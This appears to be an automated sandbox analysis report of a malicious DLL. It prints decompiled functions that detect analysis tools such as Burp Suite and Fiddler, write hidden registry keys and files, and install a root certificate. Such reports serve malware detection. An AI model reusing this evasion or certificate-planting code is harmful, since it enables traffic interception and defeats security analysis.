                                                                                                                                                			E100133E0(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10333818 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1033381c = GetProcAddress(_t37, "FlsGetValue");
					 *0x10333820 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10333818;
					_t40 = TlsSetValue;
					 *0x10333824 = _t7;
					if( *0x10333818 == 0) {
						L6:
						 *0x1033381c = TlsGetValue;
						 *0x10333818 = E10013097;
						 *0x10333820 = _t40;
						 *0x10333824 = TlsFree;
					} else {
						__eflags =  *0x1033381c;
						if( *0x1033381c == 0) {
							goto L6;
						} else {
							__eflags =  *0x10333820;
							if( *0x10333820 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10332c6c = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1033381c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E100117FA();
							 *0x10333818 = E10012FC8( *0x10333818);
							 *0x1033381c = E10012FC8( *0x1033381c);
							 *0x10333820 = E10012FC8( *0x10333820);
							 *0x10333824 = E10012FC8( *0x10333824);
							_t18 = E1000F88D();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E100130CA();
								goto L15;
							} else {
								_push(L10013256);
								_t21 =  *((intOrPtr*)(E10013034( *0x10333818)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10332c68 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E100148B1(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10332c68);
										__eflags =  *((intOrPtr*)(E10013034( *0x10333820)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E10013107(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E100130CA();
					return 0;
				}
			}
















                                                                                                                                                0x100133e0
                                                                                                                                                0x100133ec
                                                                                                                                                0x100133f0
                                                                                                                                                0x10013410
                                                                                                                                                0x1001341d
                                                                                                                                                0x1001342a
                                                                                                                                                0x1001342f
                                                                                                                                                0x10013431
                                                                                                                                                0x10013438
                                                                                                                                                0x1001343e
                                                                                                                                                0x10013443
                                                                                                                                                0x1001345b
                                                                                                                                                0x10013460
                                                                                                                                                0x1001346a
                                                                                                                                                0x10013474
                                                                                                                                                0x1001347a
                                                                                                                                                0x10013445
                                                                                                                                                0x10013445
                                                                                                                                                0x1001344c
                                                                                                                                                0x00000000
                                                                                                                                                0x1001344e
                                                                                                                                                0x1001344e
                                                                                                                                                0x10013455
                                                                                                                                                0x00000000
                                                                                                                                                0x10013457
                                                                                                                                                0x10013457
                                                                                                                                                0x10013459
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10013459
                                                                                                                                                0x10013455
                                                                                                                                                0x1001344c
                                                                                                                                                0x1001347f
                                                                                                                                                0x10013485
                                                                                                                                                0x10013488
                                                                                                                                                0x1001348d
                                                                                                                                                0x1001355f
                                                                                                                                                0x1001355f
                                                                                                                                                0x1001355f
                                                                                                                                                0x10013493
                                                                                                                                                0x1001349a
                                                                                                                                                0x1001349c
                                                                                                                                                0x1001349e
                                                                                                                                                0x00000000
                                                                                                                                                0x100134a4
                                                                                                                                                0x100134a4
                                                                                                                                                0x100134ba
                                                                                                                                                0x100134ca
                                                                                                                                                0x100134da
                                                                                                                                                0x100134e7
                                                                                                                                                0x100134ec
                                                                                                                                                0x100134f1
                                                                                                                                                0x100134f3
                                                                                                                                                0x1001355a
                                                                                                                                                0x1001355a
                                                                                                                                                0x00000000
                                                                                                                                                0x100134f5
                                                                                                                                                0x100134f5
                                                                                                                                                0x10013506
                                                                                                                                                0x10013508
                                                                                                                                                0x1001350b
                                                                                                                                                0x10013510
                                                                                                                                                0x00000000
                                                                                                                                                0x10013512
                                                                                                                                                0x1001351e
                                                                                                                                                0x10013520
                                                                                                                                                0x10013524
                                                                                                                                                0x00000000
                                                                                                                                                0x10013526
                                                                                                                                                0x10013526
                                                                                                                                                0x10013527
                                                                                                                                                0x1001353b
                                                                                                                                                0x1001353d
                                                                                                                                                0x00000000
                                                                                                                                                0x1001353f
                                                                                                                                                0x1001353f
                                                                                                                                                0x10013541
                                                                                                                                                0x10013542
                                                                                                                                                0x10013549
                                                                                                                                                0x1001354f
                                                                                                                                                0x10013553
                                                                                                                                                0x10013557
                                                                                                                                                0x10013557
                                                                                                                                                0x1001353d
                                                                                                                                                0x10013524
                                                                                                                                                0x10013510
                                                                                                                                                0x100134f3
                                                                                                                                                0x1001349e
                                                                                                                                                0x10013563
                                                                                                                                                0x100133f2
                                                                                                                                                0x100133f2
                                                                                                                                                0x100133fa
                                                                                                                                                0x100133fa

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000E9BD), ref: 100133E6
                                                                                                                                                • __mtterm.LIBCMT ref: 100133F2
                                                                                                                                                  • Part of subcall function 100130CA: __decode_pointer.LIBCMT ref: 100130DB
                                                                                                                                                  • Part of subcall function 100130CA: TlsFree.KERNEL32(0000001F,1001355F), ref: 100130F5
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10013408
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10013415
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10013422
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001342F
                                                                                                                                                • TlsAlloc.KERNEL32 ref: 1001347F
                                                                                                                                                • TlsSetValue.KERNEL32(00000000), ref: 1001349A
                                                                                                                                                • __init_pointers.LIBCMT ref: 100134A4
                                                                                                                                                • __encode_pointer.LIBCMT ref: 100134AF
                                                                                                                                                • __encode_pointer.LIBCMT ref: 100134BF
                                                                                                                                                • __encode_pointer.LIBCMT ref: 100134CF
                                                                                                                                                • __encode_pointer.LIBCMT ref: 100134DF
                                                                                                                                                • __decode_pointer.LIBCMT ref: 10013500
                                                                                                                                                • __calloc_crt.LIBCMT ref: 10013519
                                                                                                                                                • __decode_pointer.LIBCMT ref: 10013533
                                                                                                                                                • __initptd.LIBCMT ref: 10013542
                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 10013549
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                • API String ID: 2657569430-3819984048
                                                                                                                                                • Opcode ID: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
                                                                                                                                                • Instruction ID: fc5c9c1e2f27ce9595d1d322ac009eb1f7bdbda0747ab5db418f9efda91381a0
                                                                                                                                                • Opcode Fuzzy Hash: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
                                                                                                                                                • Instruction Fuzzy Hash: A3318D75C04221AADB12EB78CCC69057BE9EB843A1F10C53AF508DE2A2DB35D489CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 100193D0, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 188COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E100193D0(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t57;
				void* _t61;
				void* _t66;
				void* _t88;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t87 = __edi;
				_t70 = __ebx;
				_v532 = 0;
				E1000CF20(__edi,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF20(_t87,  &_v267, 0, 0x103);
				GetClassNameA(_a4,  &_v532, 0x104);
				GetWindowTextA(_a4,  &_v268, 0x104);
				_t35 = E1000CAC0( &_v532);
				_t91 = _t88 + 0x1c;
				_t108 = _t35;
				if(_t35 <= 0) {
					L30:
					return 1;
				}
				_t37 = E10019330(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
				_t92 = _t91 + 8;
				if(_t37 == 0) {
					_t38 = E10019330(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
					_t93 = _t92 + 8;
					__eflags = _t38;
					if(__eflags == 0) {
						_t39 = E10019330(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
						_t94 = _t93 + 8;
						__eflags = _t39;
						if(__eflags == 0) {
							_t41 = E10019330(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
							_t95 = _t94 + 8;
							__eflags = _t41;
							if(__eflags == 0) {
								_t42 = E10019330(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
								_t96 = _t95 + 8;
								__eflags = _t42;
								if(_t42 == 0) {
									_t43 = E1000CAC0( &_v268);
									_t97 = _t96 + 4;
									__eflags = _t43;
									if(__eflags <= 0) {
										L20:
										_t45 = E1000CAC0( &_v268);
										_t98 = _t97 + 4;
										__eflags = _t45;
										if(__eflags <= 0) {
											L23:
											_t46 = E10019330(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
											_t99 = _t98 + 8;
											__eflags = _t46;
											if(_t46 == 0) {
												goto L30;
											}
											_t48 = E1000CAC0( &_v268);
											_t100 = _t99 + 4;
											__eflags = _t48;
											if(__eflags <= 0) {
												L27:
												__eflags = E1000CAC0( &_v268);
												if(__eflags <= 0) {
													goto L30;
												}
												_t51 = E10019330(_t70, _t87, __eflags,  &_v268, "Burp Suite");
												__eflags = _t51;
												if(_t51 == 0) {
													goto L30;
												}
												 *0x10333dcc = 1;
												return 0;
											}
											_t53 = E10019330(_t70, _t87, __eflags,  &_v268, "Charles");
											_t100 = _t100 + 8;
											__eflags = _t53;
											if(_t53 == 0) {
												goto L27;
											}
											 *0x10333dcc = 1;
											return 0;
										}
										_t55 = E10019330(_t70, _t87, __eflags,  &_v268, "ASExplorer");
										_t98 = _t98 + 8;
										__eflags = _t55;
										if(__eflags == 0) {
											goto L23;
										}
										 *0x10333dcc = 1;
										return 0;
									}
									_t57 = E10019330(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
									_t97 = _t97 + 8;
									__eflags = _t57;
									if(_t57 == 0) {
										goto L20;
									}
									 *0x10333dcc = 1;
									return 0;
								}
								__eflags = E1000CAC0( &_v268);
								if(__eflags <= 0) {
									L16:
									goto L30;
								}
								_t61 = E10019330(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
								__eflags = _t61;
								if(_t61 == 0) {
									goto L16;
								}
								 *0x10333dcc = 1;
								return 0;
							}
							 *0x10333dcc = 1;
							return 0;
						}
						 *0x10333dcc = 1;
						return 0;
					}
					 *0x10333dcc = 1;
					return 0;
				}
				_t66 = E1000CAC0( &_v268);
				_t110 = _t66;
				if(_t66 <= 0 || E10019330(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
					goto L30;
				} else {
					 *0x10333dcc = 1;
					return 0;
				}
			}


































                                                                                                                                                0x100193d0
                                                                                                                                                0x100193d0
                                                                                                                                                0x100193d9
                                                                                                                                                0x100193ee
                                                                                                                                                0x100193f6
                                                                                                                                                0x1001940b
                                                                                                                                                0x10019423
                                                                                                                                                0x10019439
                                                                                                                                                0x10019446
                                                                                                                                                0x1001944b
                                                                                                                                                0x1001944e
                                                                                                                                                0x10019450
                                                                                                                                                0x100196a0
                                                                                                                                                0x00000000
                                                                                                                                                0x100196a0
                                                                                                                                                0x10019462
                                                                                                                                                0x10019467
                                                                                                                                                0x1001946c
                                                                                                                                                0x100194bb
                                                                                                                                                0x100194c0
                                                                                                                                                0x100194c3
                                                                                                                                                0x100194c5
                                                                                                                                                0x100194e9
                                                                                                                                                0x100194ee
                                                                                                                                                0x100194f1
                                                                                                                                                0x100194f3
                                                                                                                                                0x10019517
                                                                                                                                                0x1001951c
                                                                                                                                                0x1001951f
                                                                                                                                                0x10019521
                                                                                                                                                0x10019545
                                                                                                                                                0x1001954a
                                                                                                                                                0x1001954d
                                                                                                                                                0x1001954f
                                                                                                                                                0x10019599
                                                                                                                                                0x1001959e
                                                                                                                                                0x100195a1
                                                                                                                                                0x100195a3
                                                                                                                                                0x100195d3
                                                                                                                                                0x100195da
                                                                                                                                                0x100195df
                                                                                                                                                0x100195e2
                                                                                                                                                0x100195e4
                                                                                                                                                0x10019614
                                                                                                                                                0x10019620
                                                                                                                                                0x10019625
                                                                                                                                                0x10019628
                                                                                                                                                0x1001962a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10019633
                                                                                                                                                0x10019638
                                                                                                                                                0x1001963b
                                                                                                                                                0x1001963d
                                                                                                                                                0x10019667
                                                                                                                                                0x10019676
                                                                                                                                                0x10019678
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10019686
                                                                                                                                                0x1001968e
                                                                                                                                                0x10019690
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10019692
                                                                                                                                                0x00000000
                                                                                                                                                0x1001969c
                                                                                                                                                0x1001964b
                                                                                                                                                0x10019650
                                                                                                                                                0x10019653
                                                                                                                                                0x10019655
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10019657
                                                                                                                                                0x00000000
                                                                                                                                                0x10019661
                                                                                                                                                0x100195f2
                                                                                                                                                0x100195f7
                                                                                                                                                0x100195fa
                                                                                                                                                0x100195fc
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100195fe
                                                                                                                                                0x00000000
                                                                                                                                                0x10019608
                                                                                                                                                0x100195b1
                                                                                                                                                0x100195b6
                                                                                                                                                0x100195b9
                                                                                                                                                0x100195bb
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100195bd
                                                                                                                                                0x00000000
                                                                                                                                                0x100195c7
                                                                                                                                                0x10019560
                                                                                                                                                0x10019562
                                                                                                                                                0x1001958d
                                                                                                                                                0x00000000
                                                                                                                                                0x1001958d
                                                                                                                                                0x10019570
                                                                                                                                                0x10019578
                                                                                                                                                0x1001957a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001957c
                                                                                                                                                0x00000000
                                                                                                                                                0x10019586
                                                                                                                                                0x10019523
                                                                                                                                                0x00000000
                                                                                                                                                0x1001952d
                                                                                                                                                0x100194f5
                                                                                                                                                0x00000000
                                                                                                                                                0x100194ff
                                                                                                                                                0x100194c7
                                                                                                                                                0x00000000
                                                                                                                                                0x100194d1
                                                                                                                                                0x10019475
                                                                                                                                                0x1001947d
                                                                                                                                                0x1001947f
                                                                                                                                                0x00000000
                                                                                                                                                0x10019499
                                                                                                                                                0x10019499
                                                                                                                                                0x00000000
                                                                                                                                                0x100194a3

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 100193EE
                                                                                                                                                • _memset.LIBCMT ref: 1001940B
                                                                                                                                                • GetClassNameA.USER32(?,00000000,00000104), ref: 10019423
                                                                                                                                                • GetWindowTextA.USER32 ref: 10019439
                                                                                                                                                • _strlen.LIBCMT ref: 10019446
                                                                                                                                                  • Part of subcall function 10019330: _strlen.LIBCMT ref: 1001933B
                                                                                                                                                  • Part of subcall function 10019330: _strlen.LIBCMT ref: 10019349
                                                                                                                                                • _strlen.LIBCMT ref: 10019475
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen$_memset$ClassNameTextWindow
                                                                                                                                                • String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
                                                                                                                                                • API String ID: 1565133231-1140939848
                                                                                                                                                • Opcode ID: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
                                                                                                                                                • Instruction ID: a5f97e290b41472754b7e9ce8727d5d20b8c63e5840e42e0df40fd03ad5c4008
                                                                                                                                                • Opcode Fuzzy Hash: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
                                                                                                                                                • Instruction Fuzzy Hash: 1C51B7B995020956EB50C770AC85FDA72BCEB20348F444464AA099B142FBB5F7C8CF71
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001FA30, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 137COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                			E1001FA30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				char _v536;
				char _v803;
				char _v804;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t55;
				void* _t94;

				_t94 = __eflags;
				_t77 = __edi;
				_v536 = 0;
				_v532 = 0;
				E1000CF20(__edi,  &_v531, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0);
				E1000CD96( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
				_v804 = 0;
				E1000CF20(_t77,  &_v803, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
				E1000CD96( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
				_v268 = 0;
				E1000CF20(_t77,  &_v267, 0, 0x103);
				E1001F990(__ebx, _t77, __esi, _t94,  &_v268);
				_t44 = E1001F680(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8);
				_t95 = _t44;
				if(_t44 != 0) {
					_t46 = E1001F680(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8);
					_t96 = _t46;
					if(_t46 != 0) {
						_t48 = E1001F5F0( &_v532, _t96,  &_v532, _a4, _a8);
						_t97 = _t48;
						if(_t48 != 0) {
							_t50 = E1001F680( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8);
							_t98 = _t50;
							if(_t50 != 0) {
								_t52 = E1001F680(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8);
								_t99 = _t52;
								if(_t52 != 0 && E1001F5F0(_a4, _t99,  &_v804, _a4, _a8) != 0) {
									_t55 = E1001F720(__ebx, _t77, __esi, _a4, _a8);
									_t101 = _t55;
									if(_t55 != 0 && E1001F680( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8) != 0) {
										_v536 = 1;
									}
								}
							}
						}
					}
				}
				return _v536;
			}

















                                                                                                                                                0x1001fa30
                                                                                                                                                0x1001fa30
                                                                                                                                                0x1001fa39
                                                                                                                                                0x1001fa43
                                                                                                                                                0x1001fa58
                                                                                                                                                0x1001fa6d
                                                                                                                                                0x1001fa84
                                                                                                                                                0x1001fa8c
                                                                                                                                                0x1001faa1
                                                                                                                                                0x1001fab6
                                                                                                                                                0x1001facd
                                                                                                                                                0x1001fad5
                                                                                                                                                0x1001faea
                                                                                                                                                0x1001faf9
                                                                                                                                                0x1001fb13
                                                                                                                                                0x1001fb1b
                                                                                                                                                0x1001fb1d
                                                                                                                                                0x1001fb35
                                                                                                                                                0x1001fb3d
                                                                                                                                                0x1001fb3f
                                                                                                                                                0x1001fb54
                                                                                                                                                0x1001fb5c
                                                                                                                                                0x1001fb5e
                                                                                                                                                0x1001fb76
                                                                                                                                                0x1001fb7e
                                                                                                                                                0x1001fb80
                                                                                                                                                0x1001fb94
                                                                                                                                                0x1001fb9c
                                                                                                                                                0x1001fb9e
                                                                                                                                                0x1001fbc3
                                                                                                                                                0x1001fbcb
                                                                                                                                                0x1001fbcd
                                                                                                                                                0x1001fbef
                                                                                                                                                0x1001fbef
                                                                                                                                                0x1001fbcd
                                                                                                                                                0x1001fb9e
                                                                                                                                                0x1001fb80
                                                                                                                                                0x1001fb5e
                                                                                                                                                0x1001fb3f
                                                                                                                                                0x1001fc02

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 1001FA58
                                                                                                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FA6D
                                                                                                                                                • _strcat_s.LIBCMT ref: 1001FA84
                                                                                                                                                • _memset.LIBCMT ref: 1001FAA1
                                                                                                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FAB6
                                                                                                                                                • _strcat_s.LIBCMT ref: 1001FACD
                                                                                                                                                • _memset.LIBCMT ref: 1001FAEA
                                                                                                                                                  • Part of subcall function 1001F990: _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                  • Part of subcall function 1001F990: _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                  • Part of subcall function 1001F990: _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                  • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                  • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                  • Part of subcall function 1001F720: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                  • Part of subcall function 1001F720: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                  • Part of subcall function 1001F720: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                  • Part of subcall function 1001F720: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                  • Part of subcall function 1001F720: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                Strings
                                                                                                                                                • \Microsoft\Windows\win_a.dat, xrefs: 1001FA73
                                                                                                                                                • \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FABC
                                                                                                                                                • SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FB8A
                                                                                                                                                • SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FB6C
                                                                                                                                                • SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB09
                                                                                                                                                • SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB2B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
                                                                                                                                                • String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
                                                                                                                                                • API String ID: 475603772-4188859120
                                                                                                                                                • Opcode ID: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
                                                                                                                                                • Instruction ID: cda2b8cdb8d0272306c20495e764daec9aa036c5edc3e57df8df2dc1c216ebbd
                                                                                                                                                • Opcode Fuzzy Hash: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
                                                                                                                                                • Instruction Fuzzy Hash: D941457A944208B7EB04DB94EC86FF93368DB68344F14845CFB1C9A182E670EB848761
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 100211B0, Relevance: 16.7, APIs: 11, Instructions: 232COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E100211B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
				char _v8;
				char _v12;
				char* _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				void* _t86;
				void* _t88;
				intOrPtr _t91;
				void* _t92;
				void* _t120;
				void* _t140;
				void* _t141;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t196;

				_t192 = __esi;
				_t191 = __edi;
				_t141 = __ebx;
				_v32 = 0;
				_v20 = "https://";
				_v16 = "http://";
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				_v24 = 0;
				_v44 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_t86 = E10001A50(_a4, _v20);
				_t194 = _t193 + 8;
				if(_t86 != 0) {
					L2:
					_v8 = _a4;
					_t88 = E10001A50(_a4, _v20);
					_t195 = _t194 + 8;
					if(_t88 == 0) {
						 *_a8 = 0;
						_v8 = _v8 + 7;
						 *_a20 = 0x50;
					} else {
						 *_a8 = 1;
						_v8 = _v8 + 8;
						 *_a20 = 0x1bb;
					}
					_t91 = E10001A50(_v8, "/");
					_t196 = _t195 + 8;
					_v28 = _t91;
					if(_v28 == 0) {
						_t92 = E1000CAC0(_v8);
						_t196 = _t196 + 4;
						_v24 = _t92 + 1;
					} else {
						_v24 = _v28 - _v8 + 1;
					}
					 *_a12 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
					E1000CF20(_t191,  *_a12, 0, _v24);
					E1000D190(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
					_v28 = E10001A50(_v8, "/");
					if(_v28 == 0) {
						_v24 = 2;
						 *_a24 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
						E1000CF20(_t191,  *_a24, 0, _v24);
						E1000E280( *_a24, "/");
					} else {
						_v24 = E1000CAC0(_v8) - _v28 - _v8 + 1;
						 *_a24 = L1000CE56(_t141, _v28 - _v8, _t191, _t192, _v24);
						E1000CF20(_t191,  *_a24, 0, _v24);
						E1000E280( *_a24, _v28);
					}
					_v8 = E10001A50( *_a12, ":");
					if(_v8 == 0) {
						_t181 = _a12;
						_v24 = E1000CAC0( *_a12) + 1;
					} else {
						_v24 = _v8 -  *_a12 + 1;
						_t120 = E1000CAC0( *_a12);
						_t181 =  &_v44;
						E1000D190(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
						E1000E5E5( &_v44, "%d", _a20);
					}
					 *_a16 = L1000CE56(_t141, _t181, _t191, _t192, _v24);
					E1000CF20(_t191,  *_a16, 0, _v24);
